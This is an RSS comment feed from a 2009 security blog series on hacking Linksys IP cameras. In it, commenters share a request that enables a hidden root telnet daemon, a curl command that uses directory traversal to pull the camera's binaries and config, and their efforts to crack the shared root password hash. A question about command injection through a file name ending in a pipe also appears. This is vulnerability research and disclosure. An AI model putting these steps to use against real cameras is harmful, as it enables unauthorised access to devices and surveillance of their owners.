Comments on: Hacking Linksys IP Cameras (pt 3) http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/ Information Security Think Tank Thu, 11 Mar 2010 22:49:16 +0000 http://wordpress.org/?v=2.9.1 hourly 1 By: Hacking Linksys IP Cameras (pt 6) | GNUCITIZEN http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/comment-page-1/#comment-128209 Hacking Linksys IP Cameras (pt 6) | GNUCITIZEN Sat, 06 Mar 2010 18:03:55 +0000 https://www.gnucitizen.org/?p=3019#comment-128209 [...] 24th, 2010 This article is a continuation of the following GNUCITIZEN articles: here, here, here, here and [...] [...] 24th, 2010 This article is a continuation of the following GNUCITIZEN articles: here, here, here, here and [...]

]]> By: Bruno http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/comment-page-1/#comment-128049 Bruno Wed, 16 Dec 2009 13:02:11 +0000 https://www.gnucitizen.org/?p=3019#comment-128049 The telnetd-injection is still working with the firmware "1.1.00 build 2". We still need the password. The revision history told about some security fixing. They disabled the Support of "Setup Wizzard". A new feature is the proprietary HNAP protocol. You get a xml if you try http://IP-OF-CAM/HNAP1/. Can somebody tell the truth about security of HNAP? The telnetd-injection is still working with the firmware “1.1.00 build 2″. We still need the password.

The revision history told about some security fixing. They disabled the Support of “Setup Wizzard”.

A new feature is the proprietary HNAP protocol. You get a xml if you try http://IP-OF-CAM/HNAP1/. Can somebody tell the truth about security of HNAP?

]]> By: nick http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/comment-page-1/#comment-128047 nick Tue, 15 Dec 2009 21:49:24 +0000 https://www.gnucitizen.org/?p=3019#comment-128047 Update.... Knew I should have checked the linksys website before posting. The new 1.1 firmware is now available in their support area. It is dated 15th June 2009, which I don't think can be the date it was posted on their site, since I looked several times since then and it was not there (just the older one). Go get it!!!! Update….

Knew I should have checked the linksys website before posting. The new 1.1 firmware is now available in their support area. It is dated 15th June 2009, which I don’t think can be the date it was posted on their site, since I looked several times since then and it was not there (just the older one).

Go get it!!!!

]]> By: nick http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/comment-page-1/#comment-128046 nick Tue, 15 Dec 2009 21:35:28 +0000 https://www.gnucitizen.org/?p=3019#comment-128046 Maurice, very interesting information. I saw that thread on the forum when it was in its infancy and there was uncertainty about whether the 1.1 firmware was the newer one. Looks like it is, which makes the lack of its addition to the Linksys download area really odd. If they have decided it is stable enough to put on new retail cameras, it should be stable enough to post on the download area for current owners to use. Most strange. I would recommend everyone contact Linksys to ask them to make it available. I threw John at the password on a P3 for a week or so with no luck. It was testing 180000 combinations a second and the last passwords were fairly complex. Hence, it appears that the root password is not trivial. Even though this is a "simple" DES password, statistics show that for a good password, you need about 1000 P4s working on it for a year in order to guarantee a crack. Hence, a lot of luck is needed if using a single machine! I do wish you luck though. In the meantime, I recommend everyone who is interested in getting their cameras working better contact Linksys regularly to ask about the new firmware. Maurice, very interesting information. I saw that thread on the forum when it was in its infancy and there was uncertainty about whether the 1.1 firmware was the newer one. Looks like it is, which makes the lack of its addition to the Linksys download area really odd. If they have decided it is stable enough to put on new retail cameras, it should be stable enough to post on the download area for current owners to use. Most strange. I would recommend everyone contact Linksys to ask them to make it available.

I threw John at the password on a P3 for a week or so with no luck. It was testing 180000 combinations a second and the last passwords were fairly complex. Hence, it appears that the root password is not trivial. Even though this is a “simple” DES password, statistics show that for a good password, you need about 1000 P4s working on it for a year in order to guarantee a crack. Hence, a lot of luck is needed if using a single machine! I do wish you luck though. In the meantime, I recommend everyone who is interested in getting their cameras working better contact Linksys regularly to ask about the new firmware.

]]> By: Maurice http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/comment-page-1/#comment-127991 Maurice Sat, 14 Nov 2009 09:19:56 +0000 https://www.gnucitizen.org/?p=3019#comment-127991 I am still running john to get the password still nothing found. I want the same as what Nick wants reducing the motion sensibility. There should be a firmware around that is dealing with this issue. Version 1.1.0.0 build 2 look at this forum thread. http://forums.linksysbycisco.com/linksys/board/message?board.id=Cameras&thread.id=10525 If I have some luck I will post the password. I am still running john to get the password still nothing found.
I want the same as what Nick wants reducing the motion sensibility. There should be a firmware around that is dealing with this issue. Version 1.1.0.0 build 2 look at this forum thread. http://forums.linksysbycisco.c.....d.id=10525

If I have some luck I will post the password.

]]> By: nick http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/comment-page-1/#comment-127920 nick Fri, 16 Oct 2009 08:32:54 +0000 https://www.gnucitizen.org/?p=3019#comment-127920 I used the above to get info about this type of camera off the one I have. Nice work guys! Couple of questions. Has John finished his cogitations yet? Also, how does the camera save its altered config settings if the cramfs file system is read only...? That file must be writable by root surely. The reason I ask is that I want to mod the camera to reduce a motion detection setting (md_sensitivity). The default is ridiculously too sensitive as is widely acknowledged in many forums. I was thinking about trying to recompile the OS using the source off the linksys web site and (with having the learn it...) a cross compiler. However, being able to telnet into the camera as root and simply changing the values (default is 6) of the md sensitivity sounds much easier - providing I have root access (therefore need password) and can actually write to the config file (hence asking about the cramfs file system). Anyone got any thoughts? I used the above to get info about this type of camera off the one I have. Nice work guys! Couple of questions. Has John finished his cogitations yet? Also, how does the camera save its altered config settings if the cramfs file system is read only…? That file must be writable by root surely. The reason I ask is that I want to mod the camera to reduce a motion detection setting (md_sensitivity). The default is ridiculously too sensitive as is widely acknowledged in many forums. I was thinking about trying to recompile the OS using the source off the linksys web site and (with having the learn it…) a cross compiler. However, being able to telnet into the camera as root and simply changing the values (default is 6) of the md sensitivity sounds much easier – providing I have root access (therefore need password) and can actually write to the config file (hence asking about the cramfs file system). Anyone got any thoughts?

]]> By: Hacking Linksys IP Cameras (pt 5) | GNUCITIZEN http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/comment-page-1/#comment-127424 Hacking Linksys IP Cameras (pt 5) | GNUCITIZEN Fri, 05 Jun 2009 08:05:48 +0000 https://www.gnucitizen.org/?p=3019#comment-127424 [...] GNUCITIZEN articles: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2), Hacking Linksys IP Cameras (pt 3), Hacking Linksys IP Cameras (pt [...] [...] GNUCITIZEN articles: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2), Hacking Linksys IP Cameras (pt 3), Hacking Linksys IP Cameras (pt [...]

]]> By: Borys http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/comment-page-1/#comment-127412 Borys Wed, 03 Jun 2009 15:03:18 +0000 https://www.gnucitizen.org/?p=3019#comment-127412 It is possible to run something via opening file with "|" at the end? It is possible to run something via opening file with “|” at the end?

]]> By: pagvac http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/comment-page-1/#comment-126907 pagvac Thu, 07 May 2009 16:31:31 +0000 https://www.gnucitizen.org/?p=3019#comment-126907 For anyone interested, Bruno eventually figured out the "telnetd enabling" feature by 1) parsing the strings of the '/adm/file.cgi' binary using any of the directory traversal vulnerabilities I released in this post and 2) trial and error. ie: experimenting with already-known parameters processed by the 'file.cgi' program such as 'todo' (aforementioned in this post) For instance, you can do the following with curl: <pre><code>$ curl -s --url "http://192.168.1.115/adm/file.cgi?todo=pwnage&this_file=file.cgi" -u admin:C4mP4ssw0rd | strings | grep -i telnet</code></pre> Which returns: <pre><code>/usr/sbin/telnetd > /dev/null 2> /dev/null & <head><title>Open TelnetD</title></head> <body><p><b><font size=6>Open Telnet Daemon successfully!</font></b></p></body> inject_telnetd</code></pre> Notice the last string returned ('inject_telnetd') which is the value that needs to be assigned to the 'todo' parameter in order to enable the telnet daemon. I'm guessing there must be a neat way to obtain all parameters processed by '/adm/file.cgi' by analyzing the binary. Using IDA Pro perhaps? the binary is of type 'ELF 32-bit LSB executable, ARM, version 1' if anyone wants to know <pre><code>$ file file.cgi file.cgi: ELF 32-bit LSB executable, ARM, version 1, dynamically linked (uses shared libs), stripped</code></pre> For anyone interested, Bruno eventually figured out the “telnetd enabling” feature by

1) parsing the strings of the ‘/adm/file.cgi’ binary using any of the directory traversal vulnerabilities I released in this post and

2) trial and error. ie: experimenting with already-known parameters processed by the ‘file.cgi’ program such as ‘todo’ (aforementioned in this post)

For instance, you can do the following with curl:

$ curl -s --url "http://192.168.1.115/adm/file.cgi?todo=pwnage&this_file=file.cgi" -u admin:C4mP4ssw0rd | strings |  grep -i telnet

Which returns:

/usr/sbin/telnetd > /dev/null 2> /dev/null &
<head><title>Open TelnetD</title></head>
<body><p><b><font size=6>Open Telnet Daemon successfully!</font></b></p></body>
inject_telnetd

Notice the last string returned (‘inject_telnetd’) which is the value that needs to be assigned to the ‘todo’ parameter in order to enable the telnet daemon.

I’m guessing there must be a neat way to obtain all parameters processed by ‘/adm/file.cgi’ by analyzing the binary. Using IDA Pro perhaps? the binary is of type ‘ELF 32-bit LSB executable, ARM, version 1′ if anyone wants to know

$ file file.cgi
file.cgi: ELF 32-bit LSB executable, ARM, version 1, dynamically linked (uses shared libs), stripped
]]> By: pagvac http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/comment-page-1/#comment-126905 pagvac Thu, 07 May 2009 14:10:07 +0000 https://www.gnucitizen.org/?p=3019#comment-126905 @Bruno: I can confirm that DOES work. that's a very cool backdoor/debug feature which you have discovered! awesomeness @Bruno: I can confirm that DOES work. that’s a very cool backdoor/debug feature which you have discovered! awesomeness

]]> By: Bruno http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/comment-page-1/#comment-126902 Bruno Thu, 07 May 2009 09:14:32 +0000 https://www.gnucitizen.org/?p=3019#comment-126902 @pagvac: I am so sorry. I tried many things that evening and there was a little 'todo=' missing. I could not remember, but I did it again - found it in my brain after thinking a long time - and here comes the uncut howto after a power on (I tried it twice, please confirm): 1. try a telnet connect to the cam like this: telnet IP-OF-CAM Trying IP-OF-CAM... telnet: Unable to connect to remote host: Connection refused result: not telnetd on cam after power on - thats standard config. 2. type in that url in your browser: <pre><code>http://IP-OF-CAM/adm/file.cgi?todo=inject_telnetd</code></pre> you have to type in your admin account and pwd for cam-administration. You receive error: <pre><code>File (null) not found</code></pre> in your Browser. Don't care about that and don't power down the cam. 3. try again the telnet connect from step 1 <pre><code>telnet IP-OF-CAM Trying IP-OF-CAM... Connected to IP-OF-CAM. Escape character is '^]'. cam login: </code></pre> Here you are and you are missing the root pwd. Every user can get the adm-pwd with your tips and every user can start the telnet demon after reading this. Nice feature. Login ist quite a problem. @pagvac: I am so sorry. I tried many things that evening and there was a little ‘todo=’ missing. I could not remember, but I did it again – found it in my brain after thinking a long time – and here comes the uncut howto after a power on (I tried it twice, please confirm):

1. try a telnet connect to the cam like this:

telnet IP-OF-CAM
Trying IP-OF-CAM…
telnet: Unable to connect to remote host: Connection refused
result: not telnetd on cam after power on – thats standard config.

2. type in that url in your browser:

http://IP-OF-CAM/adm/file.cgi?todo=inject_telnetd

you have to type in your admin account and pwd for cam-administration. You receive error:

File (null) not found

in your Browser.

Don’t care about that and don’t power down the cam.

3. try again the telnet connect from step 1

telnet IP-OF-CAM
Trying IP-OF-CAM...
Connected to IP-OF-CAM.
Escape character is '^]'.
cam login:

Here you are and you are missing the root pwd. Every user can get the adm-pwd with your tips and every user can start the telnet demon after reading this. Nice feature. Login ist quite a problem.

]]> By: pagvac http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/comment-page-1/#comment-126795 pagvac Sat, 02 May 2009 23:52:19 +0000 https://www.gnucitizen.org/?p=3019#comment-126795 @Bruno: i cannot replicate the steps you provided, although i can confirm the 'inject_telnetd' string is part of the '/adm/file.cgi' binary. I tried accessing the URL you provided after logging in with the 'admin' account and no luck :( Am I missing anything? btw, my john session is still running and still no luck. not sure if gat3way managed to get anywhere with his john session? @Bruno: i cannot replicate the steps you provided, although i can confirm the ‘inject_telnetd’ string is part of the ‘/adm/file.cgi’ binary. I tried accessing the URL you provided after logging in with the ‘admin’ account and no luck :(

Am I missing anything?

btw, my john session is still running and still no luck. not sure if gat3way managed to get anywhere with his john session?

]]> By: Bruno http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/comment-page-1/#comment-126679 Bruno Sun, 26 Apr 2009 23:57:38 +0000 https://www.gnucitizen.org/?p=3019#comment-126679 Hi together, I've found a way to start the telnet daemon (Firmware V1.00R24). <pre><code>/adm/file.cgi?inject_telnetd</code></pre> <pre><code>telnet cam Trying xxx.xxx.xxx.xxx... Connected to cam. Escape character is '^]'. cam login: Login timed out after 60 seconds. Connection closed by foreign host.</code></pre> But not the pwd? What does John say? Greetings Bruno Hi together,

I’ve found a way to start the telnet daemon (Firmware V1.00R24).

/adm/file.cgi?inject_telnetd
telnet cam
Trying xxx.xxx.xxx.xxx...
Connected to cam.
Escape character is '^]'.
cam login:
Login timed out after 60 seconds.
Connection closed by foreign host.

But not the pwd? What does John say?

Greetings
Bruno

]]> By: Ladinu http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/comment-page-1/#comment-126664 Ladinu Sat, 25 Apr 2009 22:26:48 +0000 https://www.gnucitizen.org/?p=3019#comment-126664 Talked to a friend who had a different model (CIC-930W). The vuln work for this one too. The root password hash is the same. Talked to a friend who had a different model (CIC-930W). The vuln work for this one too. The root password hash is the same.

]]> By: Hacking Linksys IP Cameras (pt 4) | GNUCITIZEN http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/comment-page-1/#comment-126653 Hacking Linksys IP Cameras (pt 4) | GNUCITIZEN Sat, 25 Apr 2009 10:22:38 +0000 https://www.gnucitizen.org/?p=3019#comment-126653 [...] The Network Hacking Linksys IP Cameras (pt 4) published: April 25th, 2009 This article is a continuation of the following GNUCITIZEN articles, which include an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2), Hacking Linksys IP Cameras (pt 3). [...] [...] The Network Hacking Linksys IP Cameras (pt 4) published: April 25th, 2009 This article is a continuation of the following GNUCITIZEN articles, which include an introduction to the topic and also some initial observations: Hacking Linksys IP Cameras (pt 1), Hacking Linksys IP Cameras (pt 2), Hacking Linksys IP Cameras (pt 3). [...]

]]> By: pagvac http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/comment-page-1/#comment-126648 pagvac Fri, 24 Apr 2009 16:43:47 +0000 https://www.gnucitizen.org/?p=3019#comment-126648 @gat3way: hehe, im curious too. i've had john running for a while, but no luck yet. last password it tried was 'Tr92m3l', so it's tried relatively-complex passwords already. anyways, please post the password if you leave the cracking session for long enough and finally obtain it . @gat3way: hehe, im curious too. i’ve had john running for a while, but no luck yet. last password it tried was ‘Tr92m3l’, so it’s tried relatively-complex passwords already. anyways, please post the password if you leave the cracking session for long enough and finally obtain it .

]]> By: gat3way http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/comment-page-1/#comment-126646 gat3way Fri, 24 Apr 2009 14:39:12 +0000 https://www.gnucitizen.org/?p=3019#comment-126646 Anyway, I'm now running john against the DES-crypted password. We'll see what is going to come out after the weekend. I'm curious about what default root password did Cisco/Linksys guys choose. Anyway, I’m now running john against the DES-crypted password. We’ll see what is going to come out after the weekend. I’m curious about what default root password did Cisco/Linksys guys choose.

]]> By: pagvac http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/comment-page-1/#comment-126644 pagvac Fri, 24 Apr 2009 13:19:55 +0000 https://www.gnucitizen.org/?p=3019#comment-126644 @Ladinu: thanks a lot for testing. That's very useful to know. I wonder if other Linksys camera models different to the WVC54GCA also come with the same root password? @Ladinu: thanks a lot for testing. That’s very useful to know. I wonder if other Linksys camera models different to the WVC54GCA also come with the same root password?

]]> By: Ladinu http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/comment-page-1/#comment-126638 Ladinu Fri, 24 Apr 2009 01:33:51 +0000 https://www.gnucitizen.org/?p=3019#comment-126638 I just got this camera (same model) and tested out the vuln. It looks like that all linksys cameras have the same password. I just got this camera (same model) and tested out the vuln. It looks like that all linksys cameras have the same password.

]]> By: pagvac http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/comment-page-1/#comment-126635 pagvac Thu, 23 Apr 2009 19:05:16 +0000 https://www.gnucitizen.org/?p=3019#comment-126635 @gat3way: the web server MUST run as root since 'root' is the only OS account available (see contents of <code>/etc/passwd</code> file shown in this post). This can be confirmed by retrieving the contents of <code>/usr/local/bin/thttpd.conf</code> using any of the directory traversal vulnerabilities I just released. Notice the line containing <code>user=root</code>: <pre><code># This section overrides defaults dir=/usr/local/www #dir=/tmp/www user=root # default = nobody #logfile=/var/log/thttpd.log pidfile=/var/run/thttpd.pid cgipat=cgi|cfg|sdp|jpg # This section _documents_ defaults in effect # port=80 nosymlink # default = !chroot novhost # nocgipat # nothrottles # host=0.0.0.0 # charset=iso-8859-1</code></pre> However, you're probably right that the filesystem is cramfs, which (as you said) would mean that a file upload vuln would NOT help getting our root shell. From http://en.wikipedia.org/wiki/Cramfs: <blockquote>The file system is intentionally read-only to simplify its design</blockquote> @gat3way: the web server MUST run as root since ‘root’ is the only OS account available (see contents of /etc/passwd file shown in this post).

This can be confirmed by retrieving the contents of /usr/local/bin/thttpd.conf using any of the directory traversal vulnerabilities I just released. Notice the line containing user=root:

# This section overrides defaults
dir=/usr/local/www
#dir=/tmp/www
user=root	# default = nobody
#logfile=/var/log/thttpd.log
pidfile=/var/run/thttpd.pid
cgipat=cgi|cfg|sdp|jpg
# This section _documents_ defaults in effect
# port=80
nosymlink	# default = !chroot
novhost
# nocgipat
# nothrottles
# host=0.0.0.0
# charset=iso-8859-1

However, you’re probably right that the filesystem is cramfs, which (as you said) would mean that a file upload vuln would NOT help getting our root shell.

From http://en.wikipedia.org/wiki/Cramfs:

The file system is intentionally read-only to simplify its design

]]>